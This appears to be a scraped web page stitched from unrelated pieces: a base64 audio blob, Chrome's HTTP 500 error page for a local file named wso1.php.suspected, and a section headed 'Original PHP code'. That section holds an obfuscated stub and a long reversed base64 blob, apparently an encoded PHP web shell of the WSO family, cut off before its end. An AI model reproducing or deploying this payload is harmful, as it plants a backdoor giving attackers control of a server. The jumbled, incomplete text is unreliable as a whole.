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"></audio>
    </template>
  </div>


<script jstcache="0">(function(){function l(a,b,c){return Function.prototype.call.apply(Array.prototype.slice,arguments)}function m(a,b,c){var e=l(arguments,2);return function(){return b.apply(a,e)}}function n(a,b){var c=new p(b);for(c.h=[a];c.h.length;){var e=c,d=c.h.shift();e.i(d);for(d=d.firstChild;d;d=d.nextSibling)1==d.nodeType&&e.h.push(d)}}function p(a){this.i=a}function q(a){a.style.display=""}function r(a){a.style.display="none"};var t=/\s*;\s*/;function u(a,b){this.l.apply(this,arguments)}u.prototype.l=function(a,b){this.a||(this.a={});if(b){var c=this.a,e=b.a;for(d in e)c[d]=e[d]}else{var d=this.a;e=v;for(c in e)d[c]=e[c]}this.a.$this=a;this.a.$context=this;this.f="undefined"!=typeof a&&null!=a?a:"";b||(this.a.$top=this.f)};var v={$default:null},w=[];function x(a){for(var b in a.a)delete a.a[b];a.f=null;w.push(a)}function y(a,b,c){try{return b.call(c,a.a,a.f)}catch(e){return v.$default}}
u.prototype.clone=function(a,b,c){if(0<w.length){var e=w.pop();u.call(e,a,this);a=e}else a=new u(a,this);a.a.$index=b;a.a.$count=c;return a};var z;window.trustedTypes&&(z=trustedTypes.createPolicy("jstemplate",{createScript:function(a){return a}}));var A={};function B(a){if(!A[a])try{var b="(function(a_, b_) { with (a_) with (b_) return "+a+" })",c=window.trustedTypes?z.createScript(b):b;A[a]=window.eval(c)}catch(e){}return A[a]}
function E(a){var b=[];a=a.split(t);for(var c=0,e=a.length;c<e;++c){var d=a[c].indexOf(":");if(!(0>d)){var g=a[c].substr(0,d).replace(/^\s+/,"").replace(/\s+$/,"");d=B(a[c].substr(d+1));b.push(g,d)}}return b};function F(){}var G=0,H={0:{}},I={},J={},K=[];function L(a){a.__jstcache||n(a,function(b){M(b)})}var N=[["jsselect",B],["jsdisplay",B],["jsvalues",E],["jsvars",E],["jseval",function(a){var b=[];a=a.split(t);for(var c=0,e=a.length;c<e;++c)if(a[c]){var d=B(a[c]);b.push(d)}return b}],["transclude",function(a){return a}],["jscontent",B],["jsskip",B]];
function M(a){if(a.__jstcache)return a.__jstcache;var b=a.getAttribute("jstcache");if(null!=b)return a.__jstcache=H[b];b=K.length=0;for(var c=N.length;b<c;++b){var e=N[b][0],d=a.getAttribute(e);J[e]=d;null!=d&&K.push(e+"="+d)}if(0==K.length)return a.setAttribute("jstcache","0"),a.__jstcache=H[0];var g=K.join("&");if(b=I[g])return a.setAttribute("jstcache",b),a.__jstcache=H[b];var h={};b=0;for(c=N.length;b<c;++b){d=N[b];e=d[0];var f=d[1];d=J[e];null!=d&&(h[e]=f(d))}b=""+ ++G;a.setAttribute("jstcache",
b);H[b]=h;I[g]=b;return a.__jstcache=h}function P(a,b){a.j.push(b);a.o.push(0)}function Q(a){return a.c.length?a.c.pop():[]}
F.prototype.g=function(a,b){var c=R(b),e=c.transclude;if(e)(c=S(e))?(b.parentNode.replaceChild(c,b),e=Q(this),e.push(this.g,a,c),P(this,e)):b.parentNode.removeChild(b);else if(c=c.jsselect){c=y(a,c,b);var d=b.getAttribute("jsinstance");var g=!1;d&&("*"==d.charAt(0)?(d=parseInt(d.substr(1),10),g=!0):d=parseInt(d,10));var h=null!=c&&"object"==typeof c&&"number"==typeof c.length;e=h?c.length:1;var f=h&&0==e;if(h)if(f)d?b.parentNode.removeChild(b):(b.setAttribute("jsinstance","*0"),r(b));else if(q(b),
null===d||""===d||g&&d<e-1){g=Q(this);d=d||0;for(h=e-1;d<h;++d){var k=b.cloneNode(!0);b.parentNode.insertBefore(k,b);T(k,c,d);f=a.clone(c[d],d,e);g.push(this.b,f,k,x,f,null)}T(b,c,d);f=a.clone(c[d],d,e);g.push(this.b,f,b,x,f,null);P(this,g)}else d<e?(g=c[d],T(b,c,d),f=a.clone(g,d,e),g=Q(this),g.push(this.b,f,b,x,f,null),P(this,g)):b.parentNode.removeChild(b);else null==c?r(b):(q(b),f=a.clone(c,0,1),g=Q(this),g.push(this.b,f,b,x,f,null),P(this,g))}else this.b(a,b)};
F.prototype.b=function(a,b){var c=R(b),e=c.jsdisplay;if(e){if(!y(a,e,b)){r(b);return}q(b)}if(e=c.jsvars)for(var d=0,g=e.length;d<g;d+=2){var h=e[d],f=y(a,e[d+1],b);a.a[h]=f}if(e=c.jsvalues)for(d=0,g=e.length;d<g;d+=2)if(f=e[d],h=y(a,e[d+1],b),"$"==f.charAt(0))a.a[f]=h;else if("."==f.charAt(0)){f=f.substr(1).split(".");for(var k=b,O=f.length,C=0,U=O-1;C<U;++C){var D=f[C];k[D]||(k[D]={});k=k[D]}k[f[O-1]]=h}else f&&("boolean"==typeof h?h?b.setAttribute(f,f):b.removeAttribute(f):b.setAttribute(f,""+h));
if(e=c.jseval)for(d=0,g=e.length;d<g;++d)y(a,e[d],b);e=c.jsskip;if(!e||!y(a,e,b))if(c=c.jscontent){if(c=""+y(a,c,b),b.innerHTML!=c){for(;b.firstChild;)e=b.firstChild,e.parentNode.removeChild(e);b.appendChild(this.m.createTextNode(c))}}else{c=Q(this);for(e=b.firstChild;e;e=e.nextSibling)1==e.nodeType&&c.push(this.g,a,e);c.length&&P(this,c)}};function R(a){if(a.__jstcache)return a.__jstcache;var b=a.getAttribute("jstcache");return b?a.__jstcache=H[b]:M(a)}
function S(a,b){var c=document;if(b){var e=c.getElementById(a);if(!e){e=b();var d=c.getElementById("jsts");d||(d=c.createElement("div"),d.id="jsts",r(d),d.style.position="absolute",c.body.appendChild(d));var g=c.createElement("div");d.appendChild(g);g.innerHTML=e;e=c.getElementById(a)}c=e}else c=c.getElementById(a);return c?(L(c),c=c.cloneNode(!0),c.removeAttribute("id"),c):null}function T(a,b,c){c==b.length-1?a.setAttribute("jsinstance","*"+c):a.setAttribute("jsinstance",""+c)};window.jstGetTemplate=S;window.JsEvalContext=u;window.jstProcess=function(a,b){var c=new F;L(b);c.m=b?9==b.nodeType?b:b.ownerDocument||document:document;var e=m(c,c.g,a,b),d=c.j=[],g=c.o=[];c.c=[];e();for(var h,f,k;d.length;)h=d[d.length-1],e=g[g.length-1],e>=h.length?(e=c,f=d.pop(),f.length=0,e.c.push(f),g.pop()):(f=h[e++],k=h[e++],h=h[e++],g[g.length-1]=e,f.call(c,k,h))};
})()</script><script jstcache="0">// Copyright 2012 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * @fileoverview
 * NOTE: This file is deprecated, and provides only the minimal LoadTimeData
 * functions for places in the code still not using JS modules. Use
 * load_time_data.m.js in all new code.
 *
 * This file defines a singleton which provides access to all data
 * that is available as soon as the page's resources are loaded (before DOM
 * content has finished loading). This data includes both localized strings and
 * any data that is important to have ready from a very early stage (e.g. things
 * that must be displayed right away).
 *
 * Note that loadTimeData is not guaranteed to be consistent between page
 * refreshes (https://crbug.com/740629) and should not contain values that might
 * change if the page is re-opened later.
 */

/** @type {!LoadTimeData} */
// eslint-disable-next-line no-var
var loadTimeData;

class LoadTimeData {
  constructor() {
    /** @type {?Object} */
    this.data_ = null;
  }

  /**
   * Sets the backing object.
   *
   * Note that there is no getter for |data_| to discourage abuse of the form:
   *
   *     var value = loadTimeData.data()['key'];
   *
   * @param {Object} value The de-serialized page data.
   */
  set data(value) {
    expect(!this.data_, 'Re-setting data.');
    this.data_ = value;
  }

  /**
   * @param {string} id An ID of a value that might exist.
   * @return {boolean} True if |id| is a key in the dictionary.
   */
  valueExists(id) {
    return id in this.data_;
  }

  /**
   * Fetches a value, expecting that it exists.
   * @param {string} id The key that identifies the desired value.
   * @return {*} The corresponding value.
   */
  getValue(id) {
    expect(this.data_, 'No data. Did you remember to include strings.js?');
    const value = this.data_[id];
    expect(typeof value !== 'undefined', 'Could not find value for ' + id);
    return value;
  }

  /**
   * As above, but also makes sure that the value is a string.
   * @param {string} id The key that identifies the desired string.
   * @return {string} The corresponding string value.
   */
  getString(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'string');
    return /** @type {string} */ (value);
  }

  /**
   * Returns a formatted localized string where $1 to $9 are replaced by the
   * second to the tenth argument.
   * @param {string} id The ID of the string we want.
   * @param {...(string|number)} var_args The extra values to include in the
   *     formatted output.
   * @return {string} The formatted string.
   */
  getStringF(id, var_args) {
    const value = this.getString(id);
    if (!value) {
      return '';
    }

    const args = Array.prototype.slice.call(arguments);
    args[0] = value;
    return this.substituteString.apply(this, args);
  }

  /**
   * Returns a formatted localized string where $1 to $9 are replaced by the
   * second to the tenth argument. Any standalone $ signs must be escaped as
   * $$.
   * @param {string} label The label to substitute through.
   *     This is not an resource ID.
   * @param {...(string|number)} var_args The extra values to include in the
   *     formatted output.
   * @return {string} The formatted string.
   */
  substituteString(label, var_args) {
    const varArgs = arguments;
    return label.replace(/\$(.|$|\n)/g, function(m) {
      expect(m.match(/\$[$1-9]/), 'Unescaped $ found in localized string.');
      return m === '$$' ? '$' : varArgs[m[1]];
    });
  }

  /**
   * As above, but also makes sure that the value is a boolean.
   * @param {string} id The key that identifies the desired boolean.
   * @return {boolean} The corresponding boolean value.
   */
  getBoolean(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'boolean');
    return /** @type {boolean} */ (value);
  }

  /**
   * As above, but also makes sure that the value is an integer.
   * @param {string} id The key that identifies the desired number.
   * @return {number} The corresponding number value.
   */
  getInteger(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'number');
    expect(value === Math.floor(value), 'Number isn\'t integer: ' + value);
    return /** @type {number} */ (value);
  }

  /**
   * Override values in loadTimeData with the values found in |replacements|.
   * @param {Object} replacements The dictionary object of keys to replace.
   */
  overrideValues(replacements) {
    expect(
        typeof replacements === 'object',
        'Replacements must be a dictionary object.');
    for (const key in replacements) {
      this.data_[key] = replacements[key];
    }
  }
}

/**
 * Checks condition, throws error message if expectation fails.
 * @param {*} condition The condition to check for truthiness.
 * @param {string} message The message to display if the check fails.
 */
function expect(condition, message) {
  if (!condition) {
    throw new Error(
        'Unexpected condition on ' + document.location.href + ': ' + message);
  }
}

/**
 * Checks that the given value has the given type.
 * @param {string} id The id of the value (only used for error message).
 * @param {*} value The value to check the type on.
 * @param {string} type The type we expect |value| to be.
 */
function expectIsType(id, value, type) {
  expect(
      typeof value === type, '[' + value + '] (' + id + ') is not a ' + type);
}

expect(!loadTimeData, 'should only include this file once');
loadTimeData = new LoadTimeData();

// Expose |loadTimeData| directly on |window|, since within a JS module the
// scope is local and not all files have been updated to import the exported
// |loadTimeData| explicitly.
window.loadTimeData = loadTimeData;

console.warn('crbug/1173575, non-JS module files deprecated.');
</script><script jstcache="0">const pageData = {"details":"Details","errorCode":"HTTP ERROR 500","fontfamily":"\"sans\", Arial, sans-serif","fontsize":"75%","heading":{"hostName":"localhost","msg":"This page isn’t working"},"hideDetails":"Hide details","iconClass":"icon-generic","language":"en","reloadButton":{"msg":"Reload","reloadUrl":"http://localhost/wso1.php.suspected"},"suggestionsDetails":[],"suggestionsSummaryList":[],"summary":{"failedUrl":"http://localhost/wso1.php.suspected","hostName":"localhost","msg":"\u003Cstrong jscontent=\"hostName\">\u003C/strong> is currently unable to handle this request."},"textdirection":"ltr","title":"localhost"};loadTimeData.data = pageData;var tp = document.getElementById('t');jstProcess(new JsEvalContext(pageData), tp);</script></body></html>

Original PHP code

<?php
$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TU\x43kuKTHQ\x42\x41Fr\x41\x41\x3d\x3d";
$stt0 = "==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